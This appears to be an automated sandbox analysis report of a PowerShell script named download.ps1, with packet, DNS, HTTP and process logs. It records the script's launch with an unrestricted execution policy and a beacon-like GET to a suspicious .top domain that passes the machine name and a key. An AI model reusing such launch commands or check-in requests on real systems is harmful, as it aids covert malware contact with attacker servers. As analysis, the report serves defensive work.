                                                                                                                Dec 26, 2024 10:02:02.981272936 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.981513977 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.981563091 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.985270977 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.994755983 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.994823933 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.029917002 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.030138016 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.030208111 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.034126997 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.034225941 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.034274101 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.092303038 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.092386007 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.092442989 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.102274895 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.102410078 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.102458954 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.104904890 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.105058908 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.105109930 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.109813929 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.111319065 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.111381054 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.111381054 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.116173029 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.116245031 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.124852896 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.124989986 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.125037909 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.127356052 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.138420105 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.138469934 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.138472080 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.140877008 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.140923977 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:03.152232885 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.152456045 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:03.152508020 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:04.008048058 CET4969980192.168.2.645.61.136.138
                                                                                                                Dec 26, 2024 10:02:04.008244991 CET4970080192.168.2.6142.250.181.68

                                                                                                                UDP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 26, 2024 10:01:58.643167973 CET5160353192.168.2.61.1.1.1
                                                                                                                Dec 26, 2024 10:01:59.048149109 CET53516031.1.1.1192.168.2.6
                                                                                                                Dec 26, 2024 10:02:00.552156925 CET6190153192.168.2.61.1.1.1
                                                                                                                Dec 26, 2024 10:02:00.690301895 CET53619011.1.1.1192.168.2.6

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Dec 26, 2024 10:01:58.643167973 CET192.168.2.61.1.1.10xf5cbStandard query (0)gajaechkfhfghal.topA (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 10:02:00.552156925 CET192.168.2.61.1.1.10xdd1aStandard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Dec 26, 2024 10:01:59.048149109 CET1.1.1.1192.168.2.60xf5cbNo error (0)gajaechkfhfghal.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                Dec 26, 2024 10:02:00.690301895 CET1.1.1.1192.168.2.60xdd1aNo error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false

                                                                                                                HTTP Request Dependency Graph

                                                                                                                • gajaechkfhfghal.top
                                                                                                                • www.google.com

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.64969945.61.136.138806672C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 26, 2024 10:01:59.182908058 CET219OUTGET /w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527 HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                Host: gajaechkfhfghal.top
                                                                                                                Connection: Keep-Alive
                                                                                                                Dec 26, 2024 10:02:00.550543070 CET166INHTTP/1.1 302 Found
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Thu, 26 Dec 2024 09:02:00 GMT
                                                                                                                Content-Length: 0
                                                                                                                Connection: keep-alive
                                                                                                                Location: http://www.google.com


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.649700142.250.181.68806672C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Dec 26, 2024 10:02:00.843393087 CET159OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                Host: www.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Dec 26, 2024 10:02:02.718004942 CET1236INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 26 Dec 2024 09:02:02 GMT
                                                                                                                Expires: -1
                                                                                                                Cache-Control: private, max-age=0
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-7w6CO02cEtStPa5V75PqCQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                Server: gws
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Set-Cookie: AEC=AZ6Zc-XxSARDRInUcQJV4FqZp2DkxBP5S7p_XEqr6sKvZmuyCordd-gfWQ; expires=Tue, 24-Jun-2025 09:02:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                Set-Cookie: NID=520=SnuEBjnpUFMpD1gHJb6dCEc-8au49n1cfSYdpCxEEmowJ8kPkwuzhWZu0B3DybtuBYl4SmRmvHpf7x672oC8RFavN983R1f8p2FaLW1-iK8CmGK0QsJ4Pzooxx8MPA1g5l8FXOaMvH49BHGS5MQpDKIOszce-LUV2UX_Jn9FZECDDm3OGoSG7IRTurIS-kOZGkgnWF1U; expires=Fri, 27-Jun-2025 09:02:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                Accept-Ranges: none
                                                                                                                Vary: Accept-Encoding
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Data Raw: 33 62 63 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76
                                                                                                                Data Ascii: 3bce<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, v
                                                                                                                Dec 26, 2024 10:02:02.718070984 CET1236INData Raw: 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75
                                                                                                                Data Ascii: ideos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/log
                                                                                                                Dec 26, 2024 10:02:02.718082905 CET1236INData Raw: 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 67 3d 7b 6b 45 49 3a 27 69 68 74 74 5a 5f 4c 53 43 5f 33 57 31 73 51 50 33 65 6a 4d 71 51 49 27 2c 6b 45 58 50 49 3a 27 30 2c 33 37 30 30 33 31 38 2c 36 33 31 2c 34 33 35 2c 34 34 38 35 32 38 2c 39
                                                                                                                Data Ascii: function(){var _g={kEI:'ihttZ_LSC_3W1sQP3ejMqQI',kEXPI:'0,3700318,631,435,448528,90133,2872,2891,562,17988,54500,16105,201864,142932,45786,9779,8213,60494,30697,3801,2412,50869,7734,19358,19990,1635,9707,19569,27083,5213674,583,5992270,2842724
                                                                                                                Dec 26, 2024 10:02:02.718152046 CET1236INData Raw: 32 30 34 2c 32 2c 31 36 39 2c 31 31 38 2c 33 34 30 2c 31 34 33 2c 32 32 2c 34 30 37 2c 32 30 32 2c 31 37 39 2c 36 37 32 2c 31 37 37 2c 37 35 38 2c 31 37 36 34 2c 36 34 34 2c 34 37 36 2c 31 32 31 33 2c 32 2c 35 32 32 2c 31 38 36 2c 33 37 35 2c 31
                                                                                                                Data Ascii: 204,2,169,118,340,143,22,407,202,179,672,177,758,1764,644,476,1213,2,522,186,375,135,21349375,37198,18,2004,1478,868,4392,845,43,160,521,1806,8,2065,3,1202,597,17,5986025,2038088,3',kBL:'2zYe',kOPI:89978449};(function(){var a;((a=window.google
                                                                                                                Dec 26, 2024 10:02:02.718164921 CET1236INData Raw: 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d
                                                                                                                Data Ascii: ,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return r("",a,b)};}).call(this);(function(){goo
                                                                                                                Dec 26, 2024 10:02:02.718190908 CET1236INData Raw: 72 65 6e 74 45 6c 65 6d 65 6e 74 29 69 66 28 61 2e 74 61 67 4e 61 6d 65 3d 3d 3d 22 41 22 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65 66 22 29 3d 3d 3d 22 31 22 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31
                                                                                                                Data Ascii: rentElement)if(a.tagName==="A"){a=a.getAttribute("data-nohref")==="1";break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;he
                                                                                                                Dec 26, 2024 10:02:02.718202114 CET776INData Raw: 70 78 20 34 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 72 74 6c 20 2e 67 62 6d 7b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 31 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 7d 2e 67 62 74 6f
                                                                                                                Data Ascii: px 4px rgba(0,0,0,.2)}.gbrtl .gbm{-moz-box-shadow:1px 1px 1px rgba(0,0,0,.2)}.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;l
                                                                                                                Dec 26, 2024 10:02:02.718213081 CET1236INData Raw: 78 20 33 70 78 20 30 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 70 78 3b 6c 65 66 74 3a 34 70 78 7d 23 67 62 7a 74 6d 73 31 2c 23 67 62 69 34 6d 31 2c 23 67 62 69 34 73 2c 23 67 62 69 34 74 7b 7a 6f 6f 6d 3a 31 7d 2e 67 62 74 63 2c 2e 67 62 6d 63
                                                                                                                Data Ascii: x 3px 0;padding-top:1px;left:4px}#gbztms1,#gbi4m1,#gbi4s,#gbi4t{zoom:1}.gbtc,.gbmc,.gbmcc{display:block;list-style:none;margin:0;padding:0}.gbmc{background:#fff;padding:10px 0;position:relative;z-index:2;zoom:1}.gbt{position:relative;display:-
                                                                                                                Dec 26, 2024 10:02:02.718378067 CET1236INData Raw: 67 62 2f 69 6d 61 67 65 73 2f 62 38 5f 33 36 31 35 64 36 34 64 2e 70 6e 67 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 37 70 78 20 2d 32 32 70 78 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 70 61
                                                                                                                Data Ascii: gb/images/b8_3615d64d.png);background-position:-27px -22px;border:0;font-size:0;padding:29px 0 0;*padding:27px 0 0;width:1px}.gbzt:hover,.gbzt:focus,.gbgt-hvr,.gbgt:focus{background-color:#4c4c4c;background-image:none;_background-image:none;ba
                                                                                                                Dec 26, 2024 10:02:02.718389988 CET1236INData Raw: 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b 5f 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f
                                                                                                                Data Ascii: ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/b8_3615d64d.png);background-position:0 0;display:block;font-size:0;height:17px;width:16px}.gbto #gbi5{background-position:-6px -22px}.gbn .gbmt,.gbn .g
                                                                                                                Dec 26, 2024 10:02:02.837733030 CET1236INData Raw: 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74
                                                                                                                Data Ascii: .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shadow:0 2px 4px rgba(0,0,0,.12);-o-box-shadow:0 2p


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:04:01:53
                                                                                                                Start date:26/12/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                                                                                                Imagebase:0x7ff6e3d50000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:1
                                                                                                                Start time:04:01:53
                                                                                                                Start date:26/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff66e660000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Executed Functions

                                                                                                                  Function 00007FFD348C7AA6 Relevance: .5, Instructions: 475COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 28a56db5ce3ef3fbb5c8aa1af0696ec343cfd6dfb6284d46f41e39307ee7ed7b
                                                                                                                  • Instruction ID: 940ffd815a147aa5cc2ede38cf9c66bf7e5061ea6a55524025d4cf66fbe64937
                                                                                                                  • Opcode Fuzzy Hash: 28a56db5ce3ef3fbb5c8aa1af0696ec343cfd6dfb6284d46f41e39307ee7ed7b
                                                                                                                  • Instruction Fuzzy Hash: 49F1A670608A8E8FEBA8DF28C8557F977D1FF55310F04426BE84DC7695CB38A9458B81
                                                                                                                  Function 00007FFD348C8852 Relevance: .5, Instructions: 461COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 5f307baebdefc533c9dc60903a91660fa8081552644807530197a5cb06a2cb3c
                                                                                                                  • Instruction ID: 8b27c8a3f770a987e0e65228406cdb7f8fca1bd6026b54245067ff5a5c92c72b
                                                                                                                  • Opcode Fuzzy Hash: 5f307baebdefc533c9dc60903a91660fa8081552644807530197a5cb06a2cb3c
                                                                                                                  • Instruction Fuzzy Hash: 72E1C630608A4D8FEBA8DF28C8A57E977E1FF55311F04466ED84DC7291DF78A8458B82
                                                                                                                  Function 00007FFD348B8775 Relevance: 4.0, Strings: 3, Instructions: 269COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: L_^$L_^$L_^
                                                                                                                  • API String ID: 0-639022185
                                                                                                                  • Opcode ID: 3fcbc14ca32a5bb03f35215f0048906320b6275bd25c73495fc2f6ceba954be3
                                                                                                                  • Instruction ID: 6a65273cf44526b5bc50e610a8fdc57f004a63b21ccb2c6e0a57fadda4daf294
                                                                                                                  • Opcode Fuzzy Hash: 3fcbc14ca32a5bb03f35215f0048906320b6275bd25c73495fc2f6ceba954be3
                                                                                                                  • Instruction Fuzzy Hash: 81814771A0CB815FE75ADB2888E54A57FE0EF57354B0804BEC1C9C7193EE29B806C742
                                                                                                                  Function 00007FFD348B964A Relevance: .6, Instructions: 636COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 8900ea7982978c7939363b5485503a139fff398157327298be1a9b372d818ebc
                                                                                                                  • Instruction ID: e044fb41debd8f2583639ec2271e19efed5eb0e833dccfb7938f3eb194740f6f
                                                                                                                  • Opcode Fuzzy Hash: 8900ea7982978c7939363b5485503a139fff398157327298be1a9b372d818ebc
                                                                                                                  • Instruction Fuzzy Hash: 6312B431A0CA498FDF98DF5CC4A5AA9B7E1FF99310F140169D449D7296CE79E882CBC0
                                                                                                                  Function 00007FFD348B6992 Relevance: .6, Instructions: 601COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c65e034f9a265435816e31c65ae0cc8c0752bbb9507f01197478babd0ca7bad2
                                                                                                                  • Instruction ID: ad14ba849795fc368e1b55a9da45cf523916b508da9c1ee1160c74768a2497ff
                                                                                                                  • Opcode Fuzzy Hash: c65e034f9a265435816e31c65ae0cc8c0752bbb9507f01197478babd0ca7bad2
                                                                                                                  • Instruction Fuzzy Hash: 4312D031A08A498FDF95DF5CC4A1AA97BE1FF5A310F14017AD449D72A6CE78E842CBC1
                                                                                                                  Function 00007FFD348C8466 Relevance: .3, Instructions: 333COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 05f3afd9af31afa6217852ea8daffeaf69655a587d31684ef28180f0f8c89522
                                                                                                                  • Instruction ID: bef19333fd2ffee48a31e653b31e6ad8597e64bbd118f8548a6ef687f63d39e9
                                                                                                                  • Opcode Fuzzy Hash: 05f3afd9af31afa6217852ea8daffeaf69655a587d31684ef28180f0f8c89522
                                                                                                                  • Instruction Fuzzy Hash: CEB1E730608A4D4FEB69DF28C8557E97BE1FF55311F04426EE84DC7292DB78A845CB82
                                                                                                                  Function 00007FFD34980061 Relevance: .3, Instructions: 265COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270724899.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d8d09068e53b5d73aa7f9145d455ff1f9faa652eb0d99ccf05f9952824aa20fb
                                                                                                                  • Instruction ID: 3ae7b93da470257d5defdf67e018150a95e90b02e89e30e7e765e7c4c3a38815
                                                                                                                  • Opcode Fuzzy Hash: d8d09068e53b5d73aa7f9145d455ff1f9faa652eb0d99ccf05f9952824aa20fb
                                                                                                                  • Instruction Fuzzy Hash: 83819F22A4E7C54FE7968A7C88A55643FE0EF57224B0B01FFC588CB1A7D95D9C4AC321
                                                                                                                  Function 00007FFD348B87BC Relevance: .2, Instructions: 169COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 36d66e993a1cecfdc8b60c3f6f3962f951576c7c0c70228f4709972ed4373df6
                                                                                                                  • Instruction ID: dd99e87eee2aabe348d3ce5fd6a55aaba31b1d6ac32a26e7a06ab58a28a3fabf
                                                                                                                  • Opcode Fuzzy Hash: 36d66e993a1cecfdc8b60c3f6f3962f951576c7c0c70228f4709972ed4373df6
                                                                                                                  • Instruction Fuzzy Hash: 7841033161CB098FD79CDE18C8E5575B7E1FBA9310B10087EE0CAC3696EA25B842C782
                                                                                                                  Function 00007FFD348C2040 Relevance: .1, Instructions: 141COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: c009c0f71efcb341f35a74998a787df5807945859a393e7ae714149ae04f484c
                                                                                                                  • Instruction ID: 370bc15b92d6079f397188a5b7e5f646e3e00a0e5ba6ff3d3da9768b4cd1f416
                                                                                                                  • Opcode Fuzzy Hash: c009c0f71efcb341f35a74998a787df5807945859a393e7ae714149ae04f484c
                                                                                                                  • Instruction Fuzzy Hash: B9413B3190DB885FDB199B6CA8166A97FF0EB56310F0441AFE089D32A3CA646859C7D2
                                                                                                                  Function 00007FFD349800DD Relevance: .1, Instructions: 127COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270724899.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 14b95ecdf8a0f659ecff5729c3c21a965002bb2ee4d340f918b76619a06e2b33
                                                                                                                  • Instruction ID: 1a406f54f6dac5472089f3bd59407f1b3e63d0d2031f4348320add9acf6a89fa
                                                                                                                  • Opcode Fuzzy Hash: 14b95ecdf8a0f659ecff5729c3c21a965002bb2ee4d340f918b76619a06e2b33
                                                                                                                  • Instruction Fuzzy Hash: 0331A121B0EB854FDB86CA2C88A49243BE1EF67214B1B01EFC589CB1A3D92DDC46C751
                                                                                                                  Function 00007FFD3479E540 Relevance: .1, Instructions: 124COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2269267961.00007FFD3479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3479D000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd3479d000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
